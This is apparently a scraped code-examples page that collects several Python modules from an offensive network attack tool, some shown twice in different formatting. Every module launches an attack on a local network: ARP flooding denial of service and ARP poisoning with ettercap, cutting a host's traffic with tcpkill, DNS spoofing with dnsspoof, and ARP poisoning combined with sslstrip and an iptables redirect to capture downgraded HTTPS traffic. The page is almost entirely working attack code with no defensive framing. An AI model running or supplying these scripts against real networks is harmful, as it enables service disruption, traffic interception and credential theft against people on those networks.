def main(run):

	if isConect() and checkDevice(init.var['interface']):
		printAlert(0,"Starting ARP D.O.S attack...")
		Subprocess("ettercap -Tq -P rand_flood /"+init.var['target']+"// /"+init.var['gateway']+"// -i "+init.var['interface'])
		raw_input(printAlert(8,"to Stop ARP D.O.S Attack (PRESS [ENTER])\n"))
		commands.getoutput("killall ettercap")	
def main(run):

	if isConect() and checkDevice(init.var['drive']):
		printAlert(0,"Starting ARP Poisoning...")
		Subprocess("ettercap -T -M ARP /"+init.var['target']+"// /"+init.var['gateway']+"// -i "+init.var['drive'])
		raw_input(printAlert(8,"Stop Attack ARP (PRESS ANY KEY)"))
		commands.getoutput("killall ettercap")	
def main(run):

    if isConect() and checkDevice(init.var['interface']):
        printAlert(0, "Starting ARP D.O.S attack...")
        Subprocess("ettercap -Tq -P rand_flood /" + init.var['target'] +
                   "// /" + init.var['gateway'] + "// -i " +
                   init.var['interface'])
        raw_input(printAlert(8, "to Stop ARP D.O.S Attack (PRESS [ENTER])\n"))
        commands.getoutput("killall ettercap")
Example #4
0
def main(run):

	if isConect() and checkDevice(init.var['interface']):
		commands.getoutput("echo 1 > /proc/sys/net/ipv4/ip_forwar")
		printAlert(0,"Starting WEB D.O.S Attack in LAN")
		Subprocess("tcpkill -i "+init.var['interface']+" -9 host "+init.var['target'])
		raw_input(printAlert(8,"to Stop WEB D.O.S Attack (PRESS ANY KEY)\n"))
		commands.getoutput("killall tcpkill")
		commands.getoutput("echo 0 > /proc/sys/net/ipv4/ip_forwar")

# END CODE MODULE ############################################################################################
Example #5
0
def main(run):
	if isConect() and checkDevice(init.var['interface']):
		Loadingfile(init.var['hostfile'])
		open(init.var['hostfile'],'r')
		printAlert(0,"Starting DNS spoofing [dnsspoof].")
		commands.getoutput("iptables --flush -t nat")
		commands.getoutput("sudo fuser -kuv 53/udp  >/dev/null 2>&1 ")
		commands.getoutput("echo 1 > /proc/sys/net/ipv4/ip_forward")
		Subprocess("dnsspoof -i "+init.var['interface']+" -f "+init.var['hostfile'])
		raw_input(printAlert(8,"to Stop DNS Spoof Attack (PRESS ANY KEY)\n"))
		commands.getoutput("killall dnsspoof")
		commands.getoutput("echo 0 > /proc/sys/net/ipv4/ip_forward")
		commands.getoutput("iptables --flush -t nat")
Example #6
0
def main(run):
    if isConect() and checkDevice(init.var['interface']):
        Loadingfile(init.var['hostfile'])
        open(init.var['hostfile'], 'r')
        printAlert(0, "Starting DNS spoofing [dnsspoof].")
        commands.getoutput("iptables --flush -t nat")
        commands.getoutput("sudo fuser -kuv 53/udp  >/dev/null 2>&1 ")
        commands.getoutput("echo 1 > /proc/sys/net/ipv4/ip_forward")
        Subprocess("dnsspoof -i " + init.var['interface'] + " -f " +
                   init.var['hostfile'])
        raw_input(printAlert(8, "to Stop DNS Spoof Attack (PRESS ANY KEY)\n"))
        commands.getoutput("killall dnsspoof")
        commands.getoutput("echo 0 > /proc/sys/net/ipv4/ip_forward")
        commands.getoutput("iptables --flush -t nat")
def main(run):
	
	if isConect() and checkDevice(init.var['interface']):
		printAlert(0,"Starting ARP Poisoning [ettercap].")
		commands.getoutput("iptables --flush -t nat")
		commands.getoutput("echo 1 > /proc/sys/net/ipv4/ip_forward")
		Subprocess("ettercap -T -M ARP /"+init.var['target']+"// /"+init.var['gateway']+"// -i "+init.var['interface'])
		if init.var['https']:
			printAlert(0,"Starting SSL Capturing [sslstrip].")
			commands.getoutput("sudo fuser -kuv 10000/tcp  >/dev/null 2>&1 ")
			commands.getoutput("echo 1 > /proc/sys/net/ipv4/ip_forward")
			commands.getoutput("iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000")
			Subprocess("sslstrip")
		raw_input(printAlert(8,"to Stop ARP Attack (PRESS ANY KEY)\n"))
		commands.getoutput("killall ettercap")
		commands.getoutput("killall sslstrip")
		commands.getoutput("echo 0 > /proc/sys/net/ipv4/ip_forward")
		commands.getoutput("iptables --flush -t nat")
Example #8
0
def main(run):

    if isConect() and checkDevice(init.var['interface']):
        printAlert(0, "Starting ARP Poisoning [ettercap].")
        commands.getoutput("iptables --flush -t nat")
        commands.getoutput("echo 1 > /proc/sys/net/ipv4/ip_forward")
        Subprocess("ettercap -T -M ARP /" + init.var['target'] + "// /" +
                   init.var['gateway'] + "// -i " + init.var['interface'])
        if init.var['https'] == "true":
            printAlert(0, "Starting SSL Capturing [sslstrip].")
            commands.getoutput("sudo fuser -kuv 10000/tcp  >/dev/null 2>&1 ")
            commands.getoutput("echo 1 > /proc/sys/net/ipv4/ip_forward")
            commands.getoutput(
                "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000"
            )
            Subprocess("sslstrip")
        raw_input(printAlert(8, "to Stop ARP Attack (PRESS ANY KEY)\n"))
        commands.getoutput("killall ettercap")
        commands.getoutput("killall sslstrip")
        commands.getoutput("echo 0 > /proc/sys/net/ipv4/ip_forward")
        commands.getoutput("iptables --flush -t nat")